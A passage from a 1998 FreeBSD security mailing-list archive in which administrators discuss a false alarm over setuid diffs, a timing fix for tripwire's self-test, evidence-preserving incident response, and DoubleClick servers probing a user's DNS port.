haven't touched much of anything. >> >>Is this normal, or should I be worried? >*IMMEDIATLY* shut down both server and do not bring them to Internet until >you'll found the reason. > >It is *QUITE* abnormal. I would not call it "exploit", but it is something to >understand at once. > > >Alex. > >-- >Alexander B. Povolotsky, System Administrator > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 6 08:51:57 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA24109 for freebsd-security-outgoing; Fri, 6 Nov 1998 08:51:57 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from stan.mit.edu (STAN.MIT.EDU [18.62.1.25]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id IAA24100 for ; Fri, 6 Nov 1998 08:51:55 -0800 (PST) (envelope-from mhpower@mit.edu) From: mhpower@mit.edu Received: by stan.mit.edu (5.65/Eur1.0) id AA26461; Fri, 6 Nov 1998 11:51:29 -0500 Date: Fri, 6 Nov 1998 11:51:29 -0500 Message-ID: <199811061651.AA26461@stan.mit.edu> To: root@wagsky.com Cc: fpscha@ns1.sminter.com.ar, freebsd-security@FreeBSD.ORG Subject: Re: tripwire fails 'make test' In-Reply-To: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > ... tripwire fails to properly execute its own >testing (under either multi- or single-user mode). Is this indicative of >a problem which needs to be resolved? ... >=== test.update.sh: testing CHANGED files === >=== test.update.sh: test FAILED! (expecting 8, got 0) === I sent the tripwire authors a bug report and a patch for what I suspect is this same problem in (I think) 1996, and got a response indicating that they didn't wish to issue a new release to fix it. What I think is going on is that test.update.sh expects that at least one second will pass in between recording the mtime of a file, and the checking of the mtime of that file after a "touch" is done. On fast machines/disks, less than a second passes, and thus tripwire reports an error since it thinks it failed to detect an mtime change. The simplest workaround may be to insert a sleep statement prior to when the file is touched. I've included an untested patch below that uses this approach. If there's any interest, I can go find the longer explanation that I wrote up at the time, as well as the patch that I submitted (which was looked over by Gene Kim and Gene Spafford, who didn't object to it but yet haven't made any changes to the distribution at ftp://coast.cs.purdue.edu/pub/Purdue/Tripwire/tripwire-1.2.tar.Z). Matt *** test.update.sh.old Tue Feb 22 02:46:22 1994 --- test.update.sh Fri Nov 6 11:37:15 1998 *************** *** 169,174 **** --- 169,175 ---- ( . $MYRUN ; ) > $LOGFILE ; set _ $STATUSDEL; shift . $MYCHECK + sleep 2 touch $OLDFILE echo "=== $ME: testing CHANGED files ===" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 6 09:06:00 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA26416 for freebsd-security-outgoing; Fri, 6 Nov 1998 09:06:00 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mercury.webnology.com (mercury.webnology.com [209.155.51.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA26410 for ; Fri, 6 Nov 1998 09:05:57 -0800 (PST) (envelope-from jooji@webnology.com) Received: from localhost (jooji@localhost) by mercury.webnology.com (8.9.1/8.8.8) with SMTP id LAA30847 for ; Fri, 6 Nov 1998 11:13:36 -0600 (envelope-from jooji@webnology.com) Date: Fri, 6 Nov 1998 11:13:36 -0600 (CST) From: "Jasper O'Malley" To: security@FreeBSD.ORG Subject: Re: *huge* setuid diffs In-Reply-To: <199811061419.RAA01848@enterprise.sl.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I just got /etc/security mail from two 2.2.6 servers I administer. The > setuid diffs list every setuid program on the server as having been > removed and replaced. > > We haven't done a make world. We haven't touched much of anything. > > Is this normal, or should I be worried? My guess is that the files just got old enough so that the ls -l "last modified" information shows the year instead of the time, which is reflected in the diff between /var/log/setuid.today and /var/log/setuid.yesterday (which is what shows up in the mail /etc/security sends to you). Freaked me out the first time it happened to me, too. If that's indeed what's happened, it's completely harmless. Cheers, Mick The Reverend Jasper P. O'Malley dotdot:jooji@webnology.com Systems Administrator ringring:asktheadmiral Webnology, LLC woowoo:http://www.webnology.com/~jooji To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 6 09:07:58 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA26876 for freebsd-security-outgoing; Fri, 6 Nov 1998 09:07:58 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gutenberg.uoregon.edu (gutenberg.uoregon.edu [128.223.56.211]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA26867 for ; Fri, 6 Nov 1998 09:07:56 -0800 (PST) (envelope-from sharding@gutenberg.uoregon.edu) Received: from localhost (sharding@localhost) by gutenberg.uoregon.edu (8.9.1/8.9.1) with SMTP id JAA17465; Fri, 6 Nov 1998 09:10:30 -0800 (PST) Date: Fri, 6 Nov 1998 09:10:30 -0800 From: Sean Harding Reply-To: Sean Harding To: "Alexander B. Povolotsky" cc: mwlucas@exceptionet.com, freebsd-security@FreeBSD.ORG Subject: Re: *huge* setuid diffs In-Reply-To: <199811061419.RAA01848@enterprise.sl.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 6 Nov 1998, Alexander B. Povolotsky wrote: > *IMMEDIATLY* shut down both server and do not bring them to Internet until > you'll found the reason. Actually, I recommend pulling it off the network, but not shutting it down. If you have had an intrusion, shutting it down will destroy much of the evidence (running processes, etc). You'll have a much harder time determining what has been done. sean -- Sean Harding sharding@oregon.uoregon.edu|"Remember how it all began http://gladstone.uoregon.edu/~sharding/ | The apple and the fall of man" Consulting: http://www.efn.org/~seanh/ | --Natalie Merchant To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 6 09:10:54 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA27770 for freebsd-security-outgoing; Fri, 6 Nov 1998 09:10:54 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from smtp.www.net (smtp.www.net [142.77.1.13]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA27753 for ; Fri, 6 Nov 1998 09:10:46 -0800 (PST) (envelope-from erics@now.com) Received: from seraph.uunet.ca (uunet.ca [142.77.1.254]) by smtp.www.net with ESMTP id <114-1940>; Fri, 6 Nov 1998 12:10:25 -0500 Received: from now by seraph.uunet.ca with UUCP id <185028-11329>; Fri, 6 Nov 1998 12:10:13 -0500 Received: from baal.now.com (really [205.150.6.3]) by vishnu.now.com via rsmtp (Smail-3.2 1996-Jul-4 #2 built 1997-Apr-17) with bsmtp id for ; Fri, 6 Nov 1998 11:58:46 -0500 (EST) Received: by baal.now.com (Smail3.1.29.1 #12) id m0zbp8t-00000zC; Fri, 6 Nov 98 11:53 EST Message-Id: From: erics@now.com (Eric Siegerman) Subject: Re: *huge* setuid diffs To: tarkhil@synchroline.ru Date: Fri, 6 Nov 1998 11:53:47 -0500 Cc: mwlucas@exceptionet.com, freebsd-security@FreeBSD.ORG In-Reply-To: <199811061419.RAA01848@enterprise.sl.ru> from "Alexander B. Povolotsky" at Nov 6, 98 09:19:13 am X-Mailer: ELM [version 2.4 PL25] Content-Type: text/plain; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Alexander B. Povolotsky wrote: > > <199811061258.HAA22049@easeway.com>mwlucas@exceptionet.com writes: > >I just got /etc/security mail from two 2.2.6 servers I administer. The > >setuid diffs list every setuid program on the server as having been removed > >and replaced. One possibility is that *one* file's size changed by enough to add or subtract a digit, which caused the two "ls -l" outputs to have different spacing. A simple "diff" would report all the lines as having changed. At some point, /etc/security got smart enough to ignore such spurious differences. But I can't recall whether this had happened by 2.2.6. > It is *QUITE* abnormal. I would not call it "exploit", but it is something to > understand at once. It may or may not be abnormal, and it's more or less likely to be an intrusion -- both depending on your OS version; see above. But it's absolutely "something to understand at once"! -- | | /\ |-_|/ > Eric Siegerman, Toronto, Ont. erics@now.com | | / The Rock & Roll Baby Theorem: Syllables(x+"baby") = Syllables("baby"+x) = Syllables(x) + 2 SemanticContent(x+"baby") = SemanticContent("baby"+x) = SemanticContent(x) - Anonymous To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 6 10:52:58 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA12359 for freebsd-security-outgoing; Fri, 6 Nov 1998 10:52:58 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from carp.gbr.epa.gov (carp.gbr.epa.gov [204.46.159.110]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA12341 for ; Fri, 6 Nov 1998 10:52:56 -0800 (PST) (envelope-from mjenkins@carp.gbr.epa.gov) Received: (from mjenkins@localhost) by carp.gbr.epa.gov (8.8.8/8.8.8) id MAA27444; Fri, 6 Nov 1998 12:52:22 -0600 (CST) (envelope-from mjenkins) Date: Fri, 6 Nov 1998 12:52:22 -0600 (CST) From: Mike Jenkins Message-Id: <199811061852.MAA27444@carp.gbr.epa.gov> To: mhpower@mit.edu, root@wagsky.com Subject: Re: tripwire fails 'make test' Cc: fpscha@ns1.sminter.com.ar, freebsd-security@FreeBSD.ORG In-Reply-To: <199811061651.AA26461@stan.mit.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is one of the comp.security.unix/comp.security.misc FAQs. See http://www.cis.ohio-state.edu/hypertext/faq/usenet/computer-security/most-common-qs/faq.html, "Tripwire fails the self-test", which references ftp://coast.cs.purdue.edu/pub/COAST/Tripwire/README-third. Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 6 10:59:06 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA13010 for freebsd-security-outgoing; Fri, 6 Nov 1998 10:59:06 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA13005 for ; Fri, 6 Nov 1998 10:59:04 -0800 (PST) (envelope-from brett@lariat.org) Received: (from brett@localhost) by lariat.lariat.org (8.8.8/8.8.6) id LAA11661; Fri, 6 Nov 1998 11:57:23 -0700 (MST) Message-Id: <4.1.19981106115353.04ca84a0@127.0.0.1> X-Sender: brett@127.0.0.1 X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Fri, 06 Nov 1998 11:55:19 -0700 To: Sean Harding , "Alexander B. Povolotsky" From: Brett Glass Subject: Re: *huge* setuid diffs Cc: mwlucas@exceptionet.com, freebsd-security@FreeBSD.ORG In-Reply-To: References: <199811061419.RAA01848@enterprise.sl.ru> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org That's good advice, especially if the intruder has killed syslogd. --Brett At 09:10 AM 11/6/98 -0800, Sean Harding wrote: >On Fri, 6 Nov 1998, Alexander B. Povolotsky wrote: > >> *IMMEDIATLY* shut down both server and do not bring them to Internet until >> you'll found the reason. > >Actually, I recommend pulling it off the network, but not shutting it >down. If you have had an intrusion, shutting it down will destroy much of >the evidence (running processes, etc). You'll have a much harder time >determining what has been done. > >sean > >-- >Sean Harding sharding@oregon.uoregon.edu|"Remember how it all began >http://gladstone.uoregon.edu/~sharding/ | The apple and the fall of man" >Consulting: http://www.efn.org/~seanh/ | --Natalie Merchant > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 6 18:26:23 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA10315 for freebsd-security-outgoing; Fri, 6 Nov 1998 18:26:23 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from easeway.com (ns1.easeway.com [209.69.71.100]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA10299 for ; Fri, 6 Nov 1998 18:26:19 -0800 (PST) (envelope-from mwlucas@easeway.com) Received: (from mwlucas@localhost) by easeway.com (8.8.8/8.8.5) id VAA00825; Fri, 6 Nov 1998 21:10:52 -0500 (EST) Message-Id: <199811070210.VAA00825@easeway.com> Subject: Re: *huge* setuid diffs In-Reply-To: <4.1.19981106091836.04eb61b0@127.0.0.1> from Brett Glass at "Nov 6, 98 09:21:03 am" To: brett@lariat.org (Brett Glass), freebsd-security@FreeBSD.ORG Date: Fri, 6 Nov 1998 21:10:52 -0500 (EST) From: mwlucas@exceptionet.com X-Mailer: ELM [version 2.4ME+ PL32 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > This might be a breakin, but it also might be due to the VM > bug that changes file mod dates. (We went to red alert > over that one before we found out about it.) Upon careful checking, it seems that someone (a known someone, not an intruder) reset the clock and timezone on these machines. The diff is in the timestamp, i.e.: server~;grep df suidmessage < -r-xr-sr-x 1 bin operator 53248 Mar 25 01:51:04 1998 /bin/df > -r-xr-sr-x 1 bin operator 53248 Mar 24 20:51:04 1998 /bin/df This matches symptoms in the mail archives (now that I'm searching for "vm bug" and not "setuid diffs" :) My apologies for dumping this to the list right away: one of the servers in question handles credit card numbers, and the last thing I needed was a hack. Big thanks to everyone who responded! ==ml -- Michael Lucas | Exceptionet, Inc. | www.exceptionet.com "Exceptional Networking" | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Nov 7 01:24:40 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA12537 for freebsd-security-outgoing; Sat, 7 Nov 1998 01:24:40 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.aussie.org (hallam.lnk.telstra.net [139.130.54.166]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA12530 for ; Sat, 7 Nov 1998 01:24:35 -0800 (PST) (envelope-from mlnn4@oaks.com.au) Received: from bigbox (dialup-b1-29.raytrace.com [203.29.75.73]) by mail.aussie.org (8.9.0/8.9.0) with SMTP id UAA01040 for ; Sat, 7 Nov 1998 20:24:21 +1100 (EST) Message-Id: <199811070924.UAA01040@mail.aussie.org> From: "Hallam Oaks" To: "FreeBSD Security" Date: Sat, 07 Nov 1998 20:25:15 +1100 Reply-To: "Hallam Oaks" X-Mailer: PMMail 98 Standard (2.01.1600) For Windows NT (4.0.1381;3) MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Subject: hmmmm ... Doubleclick Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Now I wonder why Doubleclick would do this ... Just a few minutes ago I visited a site which had a doubleclick ad on it, and my IPFW monitoring tool almost immediately started chirping at me. A quick look showed that two seperate IP addresses had attempted to make TCP connections to port 53 (DNS) of the machine that hosts my proxy. That IP address does NOT host any DNS server. The two IP addresses in question were 209.67.38.88 and 199.95.207.220, both of which resolve to Doubleclick (nygda1 and exgd1a.doubleclick.net). Now, I'm not suggesting that doubleclick are doing anything they shouldn't here, but I'm still curious as to why they would attempt to make a TCP connection to a non-existant DNS server, based purely on the IP address of someone who's viewed one of their ads (it was at the Dilbert zone BTW). Anyone seen this before ? -- Chris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Nov 7 01:54:34 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA15783 for freebsd-security-outgoing; Sat, 7 Nov 1998 01:54:34 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA15778 for ; Sat, 7 Nov 1998 01:54:32 -0800 (PST) (envelope-from kkennawa@physics.adelaide.edu.au) Received: from majorana.physics.adelaide.edu.au (majorana [129.127.26.185]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id UAA01213; Sat, 7 Nov 1998 20:24:14 +1030 (CST) Received: from localhost by majorana.physics.adelaide.edu.au (5.65v4.0/1.1.19.2/19Oct98-0252AM) id AA09631; Sat, 7 Nov 1998 04:54:14 -0500 Date: Sat, 7 Nov 1998 04:54:14 -0500 (EST) From: Kris Kennaway To: Hallam Oaks Cc: FreeBSD Security Subject: Re: hmmmm ... Doubleclick In-Reply-To: <199811070924.UAA01040@mail.aussie.org> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 7 Nov 1998, Hallam Oaks wrote: > connection to a non-existant DNS server, based purely on the IP address of > someone who's viewed one of their ads (it was at the Dilbert zone BTW). Dunno the reason, but I used to see this from the Dilbert webpage also. It stopped after a week or so and I havent seen it in quite a while, so I havent followed it up with them. Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Nov 7 03:42:24 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA22555 for freebsd-security-outgoing; Sat, 7 Nov 1998 03:42:24 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from smtp2.globalserve.net (smtp2.globalserve.net [209.90.128.7]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA22544 for ; Sat, 7 Nov 1998 03:42:18 -0800 (PST) (envelope-from geoffr@globalserve.net) Received: from globalserve.net (dialin847.toronto.globalserve.net [209.90.133.84]) by smtp2.globalserve.net (8.9.1/8.9.1) with ESMTP id GAA02436; Sat, 7 Nov 1998 06:43:48 -0500 (EST) Message-ID: <3643AE14.22C49D7C@globalserve.net> Date: Fri, 06 Nov 1998 21:19:00 -0500 From: Geoffrey Robinson X-Mailer: Mozilla 4.03 [en] (Win95; U) MIME-Version: 1.0 To: Hallam Oaks CC: security@FreeBSD.ORG Subject: Re: hmmmm ... Doubleclick References: <199811070924.UAA01040@mail.aussie.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hallam Oaks wrote: > > Now I wonder why Doubleclick would do this ... > > Just a few minutes ago I visited a site which had a doubleclick ad on it, > and my IPFW monitoring tool almost immediately started chirping at me. A > quick look showed that two seperate IP addresses had attempted to make TCP > connections to port 53 (DNS) of the machine that hosts my proxy. That IP > address does NOT host any DNS server. > > The two IP addresses in question were 209.67.38.88 and 199.95.207.220, both > of which resolve to Doubleclick (nygda1 and exgd1a.doubleclick.net). > > Now, I'm not suggesting that doubleclick are doing anything they shouldn't > here, but I'm still curious as to why they would attempt to make a TCP > connection to a non-existant DNS server, based purely on the IP address of > someone who's viewed one of their ads (it was at the Dilbert zone BTW). > > Anyone seen this before ? Doubleclick can target banner ads by things like country, state, etc. The only way they can this is by maintaining a database of known ISP domains and the counties and states that the ISP services (for local dialup users). If you hit an ad and your hostname is not in the Doubleclick database their system will try to poll name servers and Internic to try and guess where you are. I don't know if that's what it was but it seems most likely. - Geoff To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Nov 7 09:15:23 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA16466 for freebsd-security-outgoing; Sat, 7 Nov 1998 09:15:23 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from uriela.in-berlin.de (servicia.in-berlin.de [192.109.42.145]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA16457 for ; Sat, 7 Nov 1998 09:15:18 -0800 (PST) (envelope-from nortobor.nostromo.in-berlin.de!ripley@servicia.in-berlin.de) Received: by uriela.in-berlin.de (Smail-3.2.0.101 1997-Dec-17 #1) id m0zcCxu-000VZuC; Sat, 7 Nov 1998 19:20:02 +0100 (CET) Received: (from ripley@localhost) by nortobor.nostromo.in-berlin.de (8.8.7/8.8.7) id XAA20628; Fri, 6 Nov 1998 23:09:30 +0100 (CET) (envelope-from ripley) Message-ID: <19981106230929.A20604@nostromo.in-berlin.de> Date: Fri, 6 Nov 1998 23:09:29 +0100 From: "H. Eckert" To: FreeBSD Security Cc: agora@uol.com.br Subject: Re: [Fwd: CERT Vendor-Initiated Bulletin VB-98.13 - Cisco_IOS_DFS] References: <3642D460.9205ECA2@agoractvm.com.br> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Mailer: Mutt 0.93.2i In-Reply-To: =?iso-8859-1?Q?=3C3642D460=2E9205ECA2=40agoractvm=2Ecom=2Ebr=3E=3B_from_?= =?iso-8859-1?Q?Teleinform=E1tica_on_Fri=2C_Nov_06=2C_1998_at_08:50:08AM_?= =?iso-8859-1?Q?-0200?= Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Quoting Teleinformática (agora@uol.com.br): > These vulnerabilities apply only to the Cisco 7xxx router family. The Cisco > 7xxx family are large, rack-mounted backbone routers used primarily by > Internet service providers and in large enterprise networks. Is there any direct relevance to FreeBSD as an operating system ? I don't think so, so this does *not* belong on freebsd-security. Greetings, Ripley -- H. Eckert, 10777 Berlin, Germany, http://www.in-berlin.de/User/nostromo/ ISO 8859-1: Ä=Ae, Ö=Oe, Ü=Ue, ä=ae, ö=oe, ü=ue, ß=sz. "(Technobabbel)" (Jetrel) - "Müssen wir uns diesen Schwachsinn wirklich anhören?" (Neelix) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Nov 7 16:15:24 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA28308 for freebsd-security-outgoing; Sat, 7 Nov 1998 16:15:24 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dt053n18.san.rr.com (dt053n18.san.rr.com [204.210.34.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA28299 for ; Sat, 7 Nov 1998 16:15:23 -0800 (PST) (envelope-from Studded@gorean.org) Received: from gorean.org (Studded@localhost [127.0.0.1]) by dt053n18.san.rr.com (8.8.8/8.8.8) with ESMTP id QAA22202; Sat, 7 Nov 1998 16:14:48 -0800 (PST) (envelope-from Studded@gorean.org) Message-ID: <3644E278.B560D328@gorean.org> Date: Sat, 07 Nov 1998 16:14:48 -0800 From: Studded Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.5 [en] (X11; I; FreeBSD 2.2.7-STABLE-1101 i386) X-Accept-Language: en MIME-Version: 1.0 To: Nicholas Charles Brawn , FreeBSD-security@FreeBSD.ORG Subject: Re: [rootshell] Security Bulletin #25 (fwd) References: <3641C882.EA06705F@gorean.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Studded wrote: > > Nicholas Charles Brawn wrote: > > > > Well I just grabbed 1.2.26 and did: > > find . -exec grep sprintf {} \; |wc -l > > This is fairly tangential, but you could accomplish exactly the same > thing with just grep: grep -iRc sprintf * Errr... actually you can't. Sorry for the confusion, I'm going to go nap now. :) Doug To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message